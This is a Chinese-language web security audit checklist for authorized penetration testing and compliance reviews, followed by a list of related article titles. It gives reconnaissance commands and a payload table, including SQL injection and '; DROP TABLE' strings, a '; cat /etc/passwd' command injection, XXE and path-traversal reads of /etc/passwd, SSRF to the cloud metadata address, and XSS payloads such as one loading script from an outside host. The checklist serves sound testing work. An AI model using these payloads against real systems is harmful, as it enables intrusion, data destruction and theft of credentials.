当前位置：首页 > article >正文

Web 安全深入审计检查清单

article 2026/5/14 9:24:58

一、审计准备与范围界定适用于渗透测试、安全评估及合规审计如等保、ISO 27001检查项具体内容授权确认获取书面授权书RoE明确测试时间、IP/域名范围、测试深度资产梳理主站、子域、API 端点、CDN、WAF、第三方组件、云存储桶基线建立记录正常业务流量特征避免测试影响生产环境工具准备Burp Suite / OWASP ZAP、Nmap、Nikto、SQLMap、XSStrike、Postman二、信息收集与暴露面分析2.1 被动信息收集不触碰目标# 子域名枚举subfinder-dexample.com-allamass enum-passive-dexample.com# 历史 URL / 参数收集waybackurls example.com|unfurl-ukeys# GitHub 泄露扫描githound --dig-files --dig-commits --repo-user example.com# 云存储桶探测# 检查 s3.amazonaws.com/example.com 等命名规律检查要点源码/配置文件/密钥是否在 GitHub/GitLab 泄露历史删除的敏感接口是否仍可通过 Wayback Machine 访问员工邮箱、内部系统域名是否在公开渠道暴露WHOIS 信息是否泄露管理员联系方式2.2 主动探测# 端口与服务扫描nmap-sS-sV-p---scripthttp-title,http-enum,ssl-enum-ciphers example.com# Web 目录爆破dirsearch-uhttps://example.com-ephp,asp,aspx,jsp,html,js,txt,bak# 技术栈识别whatweb https://example.com wappalyzer 浏览器插件检查要点非必要端口开放如 3306、6379、27017、8080、8443备份文件泄露.bak、.zip、.sql、.tar.gz敏感目录未授权访问/admin/、/api/、/.git/、/.env默认页面/安装向导未删除phpinfo、Django 调试页、IIS 欢迎页三、传输层与配置安全检查项验证方法风险等级HTTPS 强制跳转访问http://观察是否 301/307 到 HTTPS中HSTS 头curl -I https://example.com检查Strict-Transport-Security中TLS 版本与套件nmap --script ssl-enum-ciphers -p 443 example.com高证书有效性过期、自签名、通配符滥用、SAN 缺失中CSP 策略检查Content-Security-Policy是否存在及配置合理性中X-Frame-Options防止点击劫持DENY或SAMEORIGIN中X-Content-Type-Optionsnosniff防止 MIME 嗅探低Referrer-Policy控制 Referrer 泄露范围低Permissions-Policy限制浏览器敏感 API摄像头、地理位置低CORS 配置Access-Control-Allow-Origin: *是否过度宽松高Cookie 安全属性HttpOnly、Secure、SameSite是否齐全高四、认证与会话管理重点4.1 认证机制弱口令策略是否允许123456、password、与用户名相同暴力破解防护登录失败是否有验证码、IP 封禁、速率限制多因素认证 (MFA)是否支持且可绕过如响应包篡改、前端跳过密码找回逻辑是否可枚举用户、Token 可预测、链接未过期OAuth / SSO 安全回调地址是否校验、state 参数是否使用、scope 是否最小化JWT 安全算法是否为none、密钥是否弱、是否未验证签名4.2 会话管理Session ID 熵值是否可预测时间戳、自增 ID、MD5 简单哈希会话固定攻击登录后 Session ID 是否不变并发登录控制同一账号多地登录是否有提示/互踢注销有效性点击注销后旧 Session 是否立即失效服务端黑名单Cookie 作用域Path 和 Domain 是否设置过宽五、输入验证与注入漏洞核心漏洞类型测试 Payload 示例验证工具SQL 注入id1 AND 11--/id1 UNION SELECT null,null--SQLMap, Burp ScannerNoSQL 注入username[$ne]adminpassword[$ne]1手工构造命令注入; cat /etc/passwd/$(whoami)手工 Burp RepeaterLDAP 注入*)(uid*))((uid*手工XPath 注入]//password%00XML 外部实体 (XXE)!DOCTYPE foo [!ENTITY xxe SYSTEM file:///etc/passwd]Burp, XXEinjector反序列化漏洞Java ysoserial / PHP phar / Python pickleBurp, 专用工具SSRFurlhttp://169.254.169.254/latest/meta-data//urlfile:///etc/passwdBurp Collaborator模板注入 (SSTI){{7*7}}/${7*7}/% 7*7 %Tplmap深度检查项所有输入点是否均经过服务端校验URL 参数、Header、Body、Cookie、文件名WAF 绕过大小写混合、编码绕过、注释干扰、分块传输二次注入数据存入数据库后在其他功能点取出时未转义宽字节注入GBK 编码下%df绕过转义堆叠查询数据库是否支持多语句执行; DROP TABLE六、业务逻辑漏洞难以自动化发现场景攻击手法检查方法水平越权修改 ID 参数访问他人数据/order?id1001→id1002遍历 ID垂直越权普通用户伪造roleadmin或访问/admin/api修改 Cookie/Token/参数支付逻辑篡改金额、数量、折扣码、负数购买、并发请求重复支付拦截支付请求重放验证码绕过前端校验、不刷新可复用、验证码未绑定会话重放、删除参数密码重置劫持篡改响应包使success:false→true前端调试拦截注册覆盖注册已存在账号时是否可覆盖密码重复注册测试批量操作缺少防重放机制导致优惠券重复领取Intruder 批量发包条件竞争并发提现/转账导致余额负数Turbo Intruder 高并发测试七、文件操作与上传安全上传功能是否校验 MIME 类型、文件头、后缀白名单黑名单绕过php5、phtml、htaccess、双写后缀、%00 截断解析漏洞Apache/Nginx/IIS 配置错误导致图片马解析为脚本路径遍历../../../etc/passwd读取任意文件文件包含 (LFI/RFI)?page../../../../etc/passwd、php://filter 伪协议Zip Slip上传恶意 ZIP 文件覆盖系统文件SVG XSS上传 SVG 文件内嵌script触发存储型 XSS八、客户端安全XSS / CSRF8.1 XSS 全类型检测类型检测场景示例 Payload反射型 XSSURL 参数直接回显scriptalert(document.domain)/script存储型 XSS留言板、昵称、头像、文件上传img srcx onerroralert(1)DOM 型 XSS前端 JS 处理 URL Hash/参数#img srcx onerroralert(1)Blind XSS管理员后台查看触发script srchttps://xss.report/c/你的ID/script绕过技巧检查过滤了script→ 用img onerror、svg onload、iframe srcdoc过滤了alert→ 用prompt、confirm、console.log、document.location编码绕过HTML 实体、Unicode、URL 编码、JS 八进制/十六进制CSP 绕过寻找白名单域内可上传/可控的 JS 文件8.2 CSRF 防护敏感操作转账、改密、删号是否缺少 Token 验证Token 是否可预测、是否未校验、是否仅校验存在性SameSite Cookie 是否为Strict或Lax双重 Cookie 提交防御是否实现九、API 安全专项认证方式API Key 是否硬编码在前端、Bearer Token 是否过期速率限制高频请求是否触发 429否则存在爆破/撞库风险批量赋值 (Mass Assignment)提交额外字段如is_admin: trueGraphQL 安全内省查询暴露 Schema、深度递归查询导致 DoSREST 越权/api/v1/users/123横向遍历、DELETE / PUT 方法未授权响应包敏感信息是否返回密码哈希、内网 IP、数据库连接串API 版本控制旧版本 API/v1/未废弃且存在已知漏洞十、报告输出与修复建议模板严重Critical漏洞影响修复建议SQL 注入数据库完全失控参数化查询Prepared StatementsORM 框架任意文件上传 RCE服务器沦陷白名单后缀、文件内容校验、上传目录无执行权限垂直越权非授权管理员操作服务端基于 Session 的权限校验禁止前端传角色高危High漏洞影响修复建议存储型 XSS窃取管理员 Cookie、钓鱼输出编码HTML Entity、CSP、HttpOnly CookieSSRF内网渗透、云元数据窃取白名单 URL、禁用非必要协议、内网 IP 黑名单敏感信息泄露源码、密钥、数据库凭证删除备份文件、.git 目录禁止访问、密钥分离存储中危Medium漏洞修复建议点击劫持X-Frame-Options: DENY CSPframe-ancestors不安全的 CORS严格校验 Origin禁止*通配弱口令/无 MFA强制密码复杂度策略启用多因素认证十一、推荐自动化扫描组合# 1. 资产发现subfinder-dexample.com|httpx-title-tech-detect -status-code# 2. 漏洞初筛nuclei-lurls.txt-t~/nuclei-templates/# 3. 深度 Crawl XSS/SQLikatana-uhttps://example.com-d5-ourls.txt dalfoxfileurls.txt --mining-dict --deep-dom# 4. API 安全arjun-uhttps://api.example.com/endpoint# 参数发现postman / burp 手动测试业务逻辑# 5. 综合报告nmap--scriptvuln nuclei 手工验证 → 汇总至 Markdown/PDF合规提示所有测试必须在授权范围内进行。建议遵循OWASP Testing Guide v4.2及PTES渗透测试执行标准方法论保留完整测试日志以备审计追溯。

Web 安全深入审计检查清单

相关文章：

Web 安全深入审计检查清单

如何用本地AI技术实现视频硬字幕的高效提取：video-subtitle-extractor实战指南

Arm物联网战略转型：从IP授权到端到端生态构建的机遇与挑战

3步掌握Blender 3MF插件：构建高效3D打印工作流

Equalizer APO终极指南：如何免费打造专业级音频系统

如何在浏览器中高效使用微信网页版：浏览器扩展的终极解决方案

VideoRAG框架解析：基于知识图谱的超长视频理解与对话系统

深入Logos FPGA的PCB布局：如何针对FBG256、FBG484和LPG封装优化你的设计

AI记忆系统健康管理：行为数据驱动的OpenClaw记忆污染解决方案

NotebookLM私有知识库安全加固指南（GDPR/等保2.0双合规配置手册，仅限内部技术团队流通）

3分钟掌握PPT演示时间管理的终极方案：智能悬浮计时器

基于MCP协议与SearXNG构建AI智能体私有化搜索接口

【ElevenLabs企业级接入白皮书】：基于17个生产环境案例验证的鉴权体系重构、多租户语音隔离与GDPR合规审计清单

PheroPath：基于规则与数据库比对的生物信息素合成通路预测工具解析

构建个人知识记忆桥梁：从数据抽取到智能检索的工程实践

AI编程助手技能化：开源agent-skills项目实战指南

基于向量检索的代码语义搜索：从原理到CodeIndexer实战部署

ClawShelf：打造精准可控的本地媒体库元数据管理方案

Python开发者如何构建个人技能库：从代码片段到高效编程

Python Flask应用如何实现用户画像分析_记录用户行为与分析数据

Windows热键冲突终极解决方案：Hotkey Detective一键精准定位

Go语言构建高性能API网关：switchboard架构解析与微服务实践

基于MCP协议构建团队AI共享记忆中枢：Trapic项目实战指南

Bioicons：4000+免费生物科学图标库，让科研绘图不再烦恼

云薪酬系统与传统系统的核心差异与实施指南

基于vLLM的DeepSeek模型本地部署：从环境配置到生产级调优

建议科技部与教育部聘请耿同学做学术打假工作

从智能互联到智能互协：大模型时代智能体网络的新演进

ChatTTS开源对话式语音合成：情感控制与实战部署指南

3分钟搞定！PowerToys中文版终极配置指南，让Windows效率提升300%